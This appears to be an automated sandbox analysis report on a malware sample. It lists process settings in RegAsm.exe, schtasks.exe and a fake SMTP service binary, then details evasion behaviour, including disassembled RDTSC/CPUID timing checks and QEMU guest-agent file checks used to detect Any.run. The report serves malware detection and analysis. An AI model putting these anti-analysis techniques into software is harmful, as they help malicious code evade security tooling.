Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_005674F1 CreateThread,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_005643E9 InternetOpenA,InternetOpenUrlA,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0056704C CreateThread,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562C4B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00567063 CreateThread,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562C69
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00563019
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0056302B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562CE3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_005630EF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562C97
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00563092
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00567086 CreateThread,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562C81
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_005630B5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562CB5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562D73
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562D02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00563125
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562D2D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562DC5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562DEE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562D8D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562DAA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562E6D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562E1D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562EC4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562EB2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562F71
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562F0D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562FD2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562FC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00566FCB NtProtectVirtualMemory,CreateThread,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562BF5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00562F85

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000327097 second address: 0000000000327097 instructions:
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000003239D5 second address: 00000000003239D5 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F085CED7288h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F085CED7292h 0x0000001f test bx, FB3Ch 0x00000024 cmp bh, bh 0x00000026 pop ecx 0x00000027 add edi, edx 0x00000029 dec ecx 0x0000002a cmp ecx, 00000000h 0x0000002d jne 00007F085CED7224h 0x0000002f jmp 00007F085CED7292h 0x00000031 push ss 0x00000032 pop ss 0x00000033 jmp 00007F085CED728Dh 0x00000035 push ecx 0x00000036 jmp 00007F085CED7292h 0x00000038 test dx, dx 0x0000003b call 00007F085CED72DFh 0x00000040 call 00007F085CED7298h 0x00000045 lfence 0x00000048 mov edx, dword ptr [7FFE0014h] 0x0000004e lfence 0x00000051 ret 0x00000052 mov esi, edx 0x00000054 pushad 0x00000055 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000320F13 second address: 0000000000320F13 instructions:
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000322D13 second address: 0000000000322D13 instructions:
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000003232EE second address: 00000000003232EE instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000560FE0 second address: 0000000000560FE0 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000561093 second address: 0000000000561093 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000561166 second address: 0000000000561166 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000561216 second address: 0000000000561216 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000564496 second address: 0000000000564496 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000005645F2 second address: 00000000005645F2 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 000000000056220E second address: 000000000056220E instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000562398 second address: 000000000056243D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F085CF4DEA2h 0x0000000c cmp ax, 00002355h 0x00000010 call 00007F085CF4E4FBh 0x00000015 cmp dword ptr [edi+00000818h], 00000000h 0x0000001c je 00007F085CF4DF75h 0x00000022 ret 0x00000023 test edx, ecx 0x00000025 mov eax, dword ptr fs:[00000030h] 0x0000002b mov eax, dword ptr [eax+0Ch] 0x0000002e mov eax, dword ptr [eax+0Ch] 0x00000031 jmp 00007F085CF4DEA2h 0x00000033 test dx, dx 0x00000036 mov ecx, dword ptr [edi+00000808h] 0x0000003c jmp 00007F085CF4DE97h 0x0000003e mov dword ptr [eax+20h], ecx 0x00000041 jmp 00007F085CF4DEA2h 0x00000043 cmp ah, ch 0x00000045 mov esi, dword ptr [edi+00000800h] 0x0000004b jmp 00007F085CF4DEA2h 0x0000004d fnop 0x0000004f mov dword ptr [eax+18h], esi 0x00000052 add esi, dword ptr [edi+00000850h] 0x00000058 mov dword ptr [eax+1Ch], esi 0x0000005b jmp 00007F085CF4DEA2h 0x0000005d pushad 0x0000005e rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 000000000056243D second address: 00000000005624DF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F085CED7292h 0x0000000c cmp ax, 0000D992h 0x00000010 test edx, ecx 0x00000012 cmp dword ptr [ebp+70h], 01h 0x00000016 je 00007F085CED73FCh 0x0000001c mov esi, edi 0x0000001e add esi, 00001000h 0x00000024 xor ecx, ecx 0x00000026 push ecx 0x00000027 jmp 00007F085CED7292h 0x00000029 test dx, dx 0x0000002c push edi 0x0000002d mov eax, ebp 0x0000002f add eax, 0000009Ch 0x00000034 push eax 0x00000035 call 00007F085CED7915h 0x0000003a jmp 00007F085CED7292h 0x0000003c jmp 00007F085CED729Ah 0x0000003e test ch, ch 0x00000040 cmp dword ptr [esi+24h], E0000020h 0x00000047 je 00007F085CED7354h 0x0000004d cmp dword ptr [esi+24h], 60000020h 0x00000054 je 00007F085CED73C3h 0x0000005a mov ebx, 00000020h 0x0000005f jmp 00007F085CED7296h 0x00000061 ret 0x00000062 push ebx 0x00000063 jmp 00007F085CED7292h 0x00000065 cmp ah, ch 0x00000067 mov eax, esi 0x00000069 jmp 00007F085CED7292h 0x0000006b fnop 0x0000006d add eax, 08h 0x00000070 push eax 0x00000071 mov eax, dword ptr [edi+00000800h] 0x00000077 jmp 00007F085CED7292h 0x00000079 pushad 0x0000007a rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000005624DF second address: 00000000005624DF instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000562599 second address: 0000000000562599 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\Public\69577.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\Public\69577.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe	Binary or memory string: U-GA\QEMU-GA.EXE
Source: RegAsm.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000327097 second address: 0000000000327097 instructions:
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000003239D5 second address: 00000000003239D5 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F085CED7288h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F085CED7292h 0x0000001f test bx, FB3Ch 0x00000024 cmp bh, bh 0x00000026 pop ecx 0x00000027 add edi, edx 0x00000029 dec ecx 0x0000002a cmp ecx, 00000000h 0x0000002d jne 00007F085CED7224h 0x0000002f jmp 00007F085CED7292h 0x00000031 push ss 0x00000032 pop ss 0x00000033 jmp 00007F085CED728Dh 0x00000035 push ecx 0x00000036 jmp 00007F085CED7292h 0x00000038 test dx, dx 0x0000003b call 00007F085CED72DFh 0x00000040 call 00007F085CED7298h 0x00000045 lfence 0x00000048 mov edx, dword ptr [7FFE0014h] 0x0000004e lfence 0x00000051 ret 0x00000052 mov esi, edx 0x00000054 pushad 0x00000055 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000323C6A second address: 0000000000323C6A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F085CF50412h 0x0000001d popad 0x0000001e call 00007F085CF4DEDDh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000326A3C second address: 0000000000326B00 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+18h] 0x0000000f jmp 00007F085CED7292h 0x00000011 cmp bl, FFFFFFE7h 0x00000014 mov byte ptr [eax], FFFFFF90h 0x00000017 jmp 00007F085CED7292h 0x00000019 cmp ax, dx 0x0000001c mov eax, dword ptr [esp+1Ch] 0x00000020 mov byte ptr [eax], 0000006Ah 0x00000023 jmp 00007F085CED7292h 0x00000025 jmp 00007F085CED729Eh 0x00000027 mov byte ptr [eax+01h], 00000000h 0x0000002b mov byte ptr [eax+02h], FFFFFFB8h 0x0000002f jmp 00007F085CED7292h 0x00000031 test ax, cx 0x00000034 mov edx, dword ptr [ebp+0000013Ch] 0x0000003a mov dword ptr [eax+03h], edx 0x0000003d jmp 00007F085CED7292h 0x0000003f cmp dx, cx 0x00000042 jmp 00007F085CED7292h 0x00000044 pushad 0x00000045 lfence 0x00000048 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000326B00 second address: 0000000000326BBF instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov byte ptr [eax+07h], FFFFFFFFh 0x0000000f jmp 00007F085CF4DEA2h 0x00000011 cmp bl, 00000038h 0x00000014 mov byte ptr [eax+08h], FFFFFFD0h 0x00000018 jmp 00007F085CF4DEA2h 0x0000001a cmp ax, dx 0x0000001d mov byte ptr [eax+09h], FFFFFFC2h 0x00000021 mov byte ptr [eax+0Ah], 00000004h 0x00000025 mov byte ptr [eax+0Bh], 00000000h 0x00000029 jmp 00007F085CF4DEA2h 0x0000002b jmp 00007F085CF4DEAEh 0x0000002d jmp 00007F085CF4DEA2h 0x0000002f test ax, cx 0x00000032 mov eax, ebx 0x00000034 jmp 00007F085CF4DEA2h 0x00000036 cmp dx, cx 0x00000039 add eax, dword ptr [esp+08h] 0x0000003d jmp 00007F085CF4DEA2h 0x0000003f pushad 0x00000040 lfence 0x00000043 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000326BBF second address: 0000000000326BBF instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b inc ebx 0x0000000c cmp ebx, eax 0x0000000e je 00007F085CED74A5h 0x00000014 jmp 00007F085CED7292h 0x00000016 cmp bl, 00000041h 0x00000019 cmp byte ptr [ebx], FFFFFFB8h 0x0000001c jne 00007F085CED723Eh 0x0000001e jmp 00007F085CED7292h 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 000000000032767F second address: 00000000003276BA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, dword ptr [edi+00005000h] 0x00000011 cmp dword ptr [eax+04h], 00000000h 0x00000015 jne 00007F085CF4DFE6h 0x0000001b cmp dword ptr [eax+08h], 00000000h 0x0000001f jne 00007F085CF4DFDCh 0x00000025 jmp 00007F085CF4DEA2h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000320F13 second address: 0000000000320F13 instructions:
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000322D13 second address: 0000000000322D13 instructions:
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000003232EE second address: 00000000003232EE instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000563C6A second address: 0000000000563C6A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F085CF50412h 0x0000001d popad 0x0000001e call 00007F085CF4DEDDh 0x00000023 lfence 0x00000026 rdtsc
